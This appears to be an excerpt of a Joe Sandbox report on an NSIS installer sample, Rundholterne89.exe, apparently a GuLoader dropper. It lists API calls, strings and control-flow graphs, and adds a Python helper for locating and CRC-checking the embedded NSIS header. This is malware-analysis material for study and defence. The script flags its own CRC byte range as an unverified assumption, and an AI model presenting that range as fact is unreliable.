                                                                                            • GetFileAttributesA.KERNEL32(C:\Users\user\Stanglorgnet.bro), ref: 004037BD
                                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                            • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                            • API String ID: 1975747703-529818883
                                                                                            • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                            • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                            • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                            • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

                                                                                             Control-flow Graph (the executed / not-executed block colouring of the rendered graph is not preserved; nodes are numbered as in the graph)
                                                                                             • 427: 402c66-402cb4 GetTickCount, GetModuleFileNameA, call 4059a2
                                                                                             • 430: 402cc0-402cee call 405d2f, call 4057e8, call 405d2f, GetFileSize
                                                                                             • 431: 402cb6-402cbb
                                                                                             • 432: 402e98-402e9c
                                                                                             • 439: 402cf4
                                                                                             • 440: 402ddb-402de9 call 402c02
                                                                                             • 442: 402cf9-402d10
                                                                                             • 444: 402d12
                                                                                             • 445: 402d14-402d1d call 4030b1
                                                                                             • 446: 402deb-402dee
                                                                                             • 447: 402e3e-402e43
                                                                                             • 449: 402df0-402e08 call 4030c7, call 4030b1
                                                                                             • 450: 402e12-402e3c GlobalAlloc, call 4030c7, call 402e9f
                                                                                             • 453: 402d23-402d2a
                                                                                             • 454: 402e45-402e4d call 402c02
                                                                                             • 458: 402da6-402daa
                                                                                             • 459: 402d2c-402d40 call 40595d
                                                                                             • 463: 402db4-402dba
                                                                                             • 464: 402dac-402db3 call 402c02
                                                                                             • 469: 402dc9-402dd3
                                                                                             • 470: 402dbc-402dc6 call 40613d
                                                                                             • 473: 402dd9
                                                                                             • 474: 402e4f-402e60
                                                                                             • 475: 402e0a-402e10
                                                                                             • 478: 402d42-402d49
                                                                                             • 479: 402e62
                                                                                             • 480: 402e68-402e6d
                                                                                             • 482: 402d4b-402d52
                                                                                             • 483: 402d54-402d5b
                                                                                             • 484: 402e6e-402e74
                                                                                             • 485: 402d5d-402d64
                                                                                             • 486: 402e76-402e91 SetFilePointer, call 40595d
                                                                                             • 487: 402d66-402d86
                                                                                             • 489: 402d8c-402d90
                                                                                             • 490: 402e96
                                                                                             • 491: 402d92-402d96
                                                                                             • 492: 402d98-402da0
                                                                                             • 493: 402da2-402da4
                                                                                             Edges: 427->430, 427->431, 431->432, 430->439, 430->440, 439->442, 440->446, 440->447, 442->444, 442->445, 444->445, 445->453, 445->454, 446->449, 446->450, 447->432, 449->447, 449->475, 450->447, 450->474, 453->458, 453->459, 454->447, 458->463, 458->464, 459->463, 459->478, 463->469, 463->470, 464->463, 469->442, 469->473, 470->469, 473->440, 474->479, 474->480, 475->447, 475->450, 478->463, 478->482, 479->480, 480->484, 482->463, 482->483, 483->463, 483->485, 484->484, 484->486, 485->463, 485->487, 486->490, 487->447, 487->489, 489->491, 489->492, 490->432, 491->473, 491->492, 492->463, 492->493, 493->463
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Rundholterne89.exe,00000400), ref: 00402C93
                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 00402CDF
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                            • soft, xrefs: 00402D54
                                                                                            • Inst, xrefs: 00402D4B
                                                                                             • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                            • Null, xrefs: 00402D5D
                                                                                            • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                            • Error launching installer, xrefs: 00402CB6
                                                                                            • C:\Users\user\Desktop\Rundholterne89.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 00402C66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: the same ten memory dumps as listed for the function above
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                             • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Rundholterne89.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                            • API String ID: 4283519449-1477234186
                                                                                            • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                            • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                                             Control-flow Graph (the executed / not-executed block colouring of the rendered graph is not preserved; nodes are numbered as in the graph)
                                                                                             • 625: 402e9f-402eb3
                                                                                             • 626: 402eb5
                                                                                             • 627: 402ebc-402ec5
                                                                                             • 628: 402ec7
                                                                                             • 629: 402ece-402ed3
                                                                                             • 630: 402ee3-402ef0 call 4030b1
                                                                                             • 631: 402ed5-402ede call 4030c7
                                                                                             • 635: 402ef6-402efa
                                                                                             • 636: 40309f
                                                                                             • 637: 402f00-402f49 GetTickCount
                                                                                             • 638: 40304a-40304c
                                                                                             • 639: 4030a1-4030a2
                                                                                             • 640: 40308c-40308f
                                                                                             • 641: 40304e-403051
                                                                                             • 642: 4030a7
                                                                                             • 643: 402f4f-402f57
                                                                                             • 644: 4030aa-4030ae
                                                                                             • 645: 403091
                                                                                             • 646: 403094-40309d call 4030b1
                                                                                             • 647: 403053
                                                                                             • 648: 402f59
                                                                                             • 649: 402f5c-402f6a call 4030b1
                                                                                             • 651: 403056-40305c
                                                                                             • 654: 403060-40306e call 4030b1
                                                                                             • 655: 40305e
                                                                                             • 657: 4030a4
                                                                                             • 659: 402f70-402f79
                                                                                             • 660: 402f7f-402f9f call 4061ab
                                                                                             • 663: 403070-40307c call 405a49
                                                                                             • 667: 403042-403044
                                                                                             • 668: 402fa5-402fb8 GetTickCount
                                                                                             • 669: 403046-403048
                                                                                             • 670: 40307e-403088
                                                                                             • 671: 402fba-402fc2
                                                                                             • 672: 402ffd-402fff
                                                                                             • 673: 40308a
                                                                                             • 674: 402fc4-402fc8
                                                                                             • 675: 402fca-402ffa MulDiv, wsprintfA, call 404f48
                                                                                             • 676: 403001-403005
                                                                                             • 677: 403036-40303a
                                                                                             • 678: 403040
                                                                                             • 680: 403007-40300e call 405a49
                                                                                             • 681: 40301c-403027
                                                                                             • 682: 40302a-40302e
                                                                                             • 685: 403034
                                                                                             • 686: 403013-403015
                                                                                             • 687: 403017-40301a
                                                                                             Edges: 625->626, 625->627, 626->627, 627->628, 627->629, 628->629, 629->630, 629->631, 630->635, 630->636, 631->630, 635->637, 635->638, 636->639, 637->642, 637->643, 638->640, 638->641, 639->644, 640->645, 640->646, 641->642, 641->647, 642->644, 643->648, 643->649, 645->646, 646->636, 646->657, 647->651, 648->649, 649->636, 649->659, 651->654, 651->655, 654->636, 654->663, 655->654, 657->642, 659->660, 660->667, 660->668, 663->669, 663->670, 667->639, 668->671, 668->672, 669->639, 670->651, 670->673, 671->674, 671->675, 672->676, 672->677, 673->642, 674->672, 674->675, 675->672, 676->680, 676->681, 677->643, 677->678, 678->642, 680->686, 681->682, 682->660, 682->685, 685->642, 686->669, 686->687, 687->682
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: the same ten memory dumps as listed for the function above
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: DA$ DA$... %d%%$DwA
                                                                                            • API String ID: 551687249-506594815
                                                                                            • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                            • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
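The two functions above are the NSIS installer stub's loader path rather than the GuLoader payload itself: the strings "Null", "soft" and "Inst" compared at 402d5d, 402d54 and 402d4b are the three nsinst[] words of the NSIS firstheader signature, the "Installer integrity check has failed" message is the failure branch at 402e3e, and the GetTickCount / MulDiv / wsprintfA loop at 402e9f with its "... %d%%" string is the progress display used while the installer is read and verified. The Python below is an added example (not code from the Joe Sandbox report and not NSIS's own source) that mirrors that decision path so an analyst can locate the embedded NSIS data in a sample like Rundholterne89.exe before unpacking it. The header layout and constants (siginfo 0xDEADBEEF, the 512-byte alignment, the FH_FLAGS_NO_CRC bit) are the public NSIS fileform.h values; the exact byte range covered by the CRC trailer is an assumption marked in the code, and the sample input is constructed inline rather than taken from the analysed file.

```python
"""NSIS firstheader locator and integrity check, modelled on the stub's 0x402c66 path.

Added example (not code from the Joe Sandbox report or from NSIS). Constants
are the public values from NSIS Source/exehead/fileform.h; the sample input is
constructed inline and is not a real installer.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF                    # firstheader.siginfo
FH_INT = (b"Null", b"soft", b"Inst")   # nsinst[0..2]: the "Null", "soft", "Inst" strings in the report
FH_FLAGS_NO_CRC = 4                    # set when the installer was built without a CRC
FIRSTHEADER_FMT = "<II4s4s4sII"        # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)   # 28 bytes
BLOCK = 512                            # makensis pads the stub to 512 bytes; the stub tests one block start at a time


def find_firstheader(data: bytes):
    """Scan 512-byte block starts for the NSIS signature; return (offset, fields) or None."""
    for off in range(0, len(data) - FIRSTHEADER_SIZE + 1, BLOCK):
        flags, sig, n0, n1, n2, hdr_len, rest_len = struct.unpack_from(FIRSTHEADER_FMT, data, off)
        if sig != FH_SIG or (n0, n1, n2) != FH_INT:
            continue
        return off, {"flags": flags,
                     "length_of_header": hdr_len,
                     "length_of_all_following_data": rest_len}
    return None


def verify_crc(data: bytes, off: int, rest_len: int) -> bool:
    """CRC-32 check of the NSIS block.

    Assumption (not taken from the report): the 4-byte CRC trailer is the last
    4 bytes of the block and covers every byte from file start up to it.
    Confirm the covered range against exehead/Main.c before relying on this.
    """
    end = off + rest_len
    stored = struct.unpack_from("<I", data, end - 4)[0]
    return stored == (zlib.crc32(data[:end - 4]) & 0xFFFFFFFF)


def check_installer(data: bytes) -> dict:
    """Reproduce the stub's decision path: signature, length sanity, then CRC."""
    found = find_firstheader(data)
    if found is None:
        return {"ok": False, "reason": "NSIS signature not found"}
    off, h = found
    # The stub compares length_of_all_following_data with the bytes left in the file;
    # a shortfall is the "Installer integrity check has failed" path at 0x402e3e.
    if h["length_of_all_following_data"] > len(data) - off:
        return {"ok": False, "reason": "Installer integrity check has failed (truncated)"}
    result = {"ok": True, "header_offset": off,
              "compressed_header_offset": off + FIRSTHEADER_SIZE, **h}
    if not (h["flags"] & FH_FLAGS_NO_CRC):
        result["crc_ok"] = verify_crc(data, off, h["length_of_all_following_data"])
        if not result["crc_ok"]:
            result["ok"] = False
            result["reason"] = "Installer integrity check has failed (CRC mismatch)"
    return result


def build_sample(stub_len: int = 1024, payload: bytes = b"\x00" * 100, with_crc: bool = True) -> bytes:
    """Constructed input: filler standing in for the exehead, an aligned firstheader, payload, CRC trailer."""
    filler = b"\x90" * stub_len
    flags = 0 if with_crc else FH_FLAGS_NO_CRC
    following = FIRSTHEADER_SIZE + len(payload) + (4 if with_crc else 0)
    hdr = struct.pack(FIRSTHEADER_FMT, flags, FH_SIG, *FH_INT, len(payload), following)
    body = filler + hdr + payload
    if with_crc:
        body += struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    return body


if __name__ == "__main__":
    sample = build_sample()
    print(check_installer(sample))
    damaged = bytearray(sample)
    damaged[1024 + FIRSTHEADER_SIZE + 10] ^= 0xFF     # flip one payload byte
    print(check_installer(bytes(damaged)))
```

On a real sample the offset returned by find_firstheader is where the compressed NSIS header and the embedded files start, which is the region to carve and decompress; a CRC failure on a sample that was modified after being built (for instance by an operator padding or patching the installer) reproduces the same "integrity check" error the stub shows.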

                                                                                             Control-flow Graph (the executed / not-executed block colouring of the rendered graph is not preserved; nodes are numbered as in the graph)
                                                                                             • 688: 401751-401774 call 402a3a, call 40580e
                                                                                             • 693: 401776-40177c call 405d2f
                                                                                             • 694: 40177e-401790 call 405d2f, call 4057a1, lstrcatA
                                                                                             • 699: 401795-40179b call 405f9a
                                                                                             • 704: 4017a0-4017a4
                                                                                             • 705: 4017a6-4017b0 call 406033
                                                                                             • 706: 4017d7-4017da
                                                                                             • 708: 4017e2-4017fe call 4059a2
                                                                                             • 709: 4017dc-4017dd call 40597d
                                                                                             • 713: 4017c2-4017d4
                                                                                             • 714: 4017b2-4017c0 CompareFileTime
                                                                                             • 716: 401800-401803
                                                                                             • 717: 401876-40189f call 404f48, call 402e9f
                                                                                             • 719: 401805-401847 call 405d2f (x2), call 405d51, call 405d2f, call 405525
                                                                                             • 720: 401858-401862 call 404f48
                                                                                             • 730: 4018a1-4018a5
                                                                                             • 731: 4018a7-4018b3 SetFileTime
                                                                                             • 732: 40186b-401871
                                                                                             • 733: 4028d8
                                                                                             • 735: 4018b9-4018c4 CloseHandle
                                                                                             • 737: 4018ca-4018cd
                                                                                             • 738: 4028cf-4028d2
                                                                                             • 739: 4028da-4028de
                                                                                             • 741: 4018e2-4018e5 call 405d51
                                                                                             • 742: 4018cf-4018e0 call 405d51, lstrcatA
                                                                                             • 748: 4018ea-402273 call 405525
                                                                                             • 752: 40184d-40184e
                                                                                             • 754: 401850-401851
                                                                                             Edges: 688->693, 688->694, 693->699, 694->699, 699->704, 704->705, 704->706, 705->713, 705->714, 706->708, 706->709, 708->716, 708->717, 709->708, 713->706, 714->713, 716->719, 716->720, 717->730, 717->731, 719->704, 719->752, 720->732, 730->731, 730->735, 731->735, 732->733, 733->739, 735->737, 735->738, 737->741, 737->742, 738->733, 741->748, 742->748, 748->738, 748->739, 752->732, 752->754, 754->720
                                                                                            APIs
                                                                                            • lstrcatA.KERNEL32(00000000,00000000,%Churrasco241%\mistrusted\Undreadful,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 00401790
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,%Churrasco241%\mistrusted\Undreadful,%Churrasco241%\mistrusted\Undreadful,00000000,00000000,%Churrasco241%\mistrusted\Undreadful,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 004017BA
                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Hermandas Setup,NSIS Error), ref: 00405D3C
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: the same ten memory dumps as listed for the function above
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: %Churrasco241%\mistrusted\Undreadful$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro
                                                                                            • API String ID: 1941528284-137748297
                                                                                            • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                            • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                                             Control-flow Graph (the executed / not-executed block colouring of the rendered graph is not preserved; nodes are numbered as in the graph)
                                                                                             • 755: 40540e-405459 CreateDirectoryA
                                                                                             • 756: 40545b-40545d
                                                                                             • 757: 40545f-40546c GetLastError
                                                                                             • 758: 405486-405488
                                                                                             • 759: 40546e-405482 SetFileSecurityA
                                                                                             • 760: 405484 GetLastError
                                                                                             Edges: 755->756, 755->757, 756->758, 757->758, 757->759, 759->756, 759->760, 760->758
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                            • GetLastError.KERNEL32 ref: 00405465
                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                            • GetLastError.KERNEL32 ref: 00405484
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: the same ten memory dumps as listed for the function above
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                            • API String ID: 3449924974-1471963312
                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                            • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                            • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                                             Control-flow Graph (the executed / not-executed block colouring of the rendered graph is not preserved; nodes are numbered as in the graph)
                                                                                             • 761: 40605a-40607a GetSystemDirectoryA
                                                                                             • 762: 40607c
                                                                                             • 763: 40607e-406080
                                                                                             • 764: 406090-406092
                                                                                             • 765: 406082-40608a
                                                                                             • 766: 40608c-40608e
                                                                                             • 767: 406093-4060c5 wsprintfA, LoadLibraryExA
                                                                                             Edges: 761->762, 761->763, 762->763, 763->764, 763->765, 764->767, 765->764, 765->766, 766->767
                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                            • wsprintfA.USER32 ref: 004060AA
                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-4240819195
                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                            • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                            • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 768 4059d1-4059db 769 4059dc-405a07 GetTickCount GetTempFileNameA 768->769 770 405a16-405a18 769->770 771 405a09-405a0b 769->771 772 405a10-405a13 770->772 771->769 773 405a0d 771->773 773->772
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 004059D1
                                                                                            • nsa, xrefs: 004059DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-3221393730
                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 774 401bca-401be2 call 402a1d * 2 779 401be4-401beb call 402a3a 774->779 780 401bee-401bf2 774->780 779->780 782 401bf4-401bfb call 402a3a 780->782 783 401bfe-401c04 780->783 782->783 786 401c06-401c1a call 402a1d * 2 783->786 787 401c4a-401c70 call 402a3a * 2 FindWindowExA 783->787 798 401c3a-401c48 SendMessageA 786->798 799 401c1c-401c38 SendMessageTimeoutA 786->799 797 401c76 787->797 800 401c79-401c7c 797->800 798->797 799->800 801 401c82 800->801 802 4028cf-4028de 800->802 801->802
                                                                                            APIs
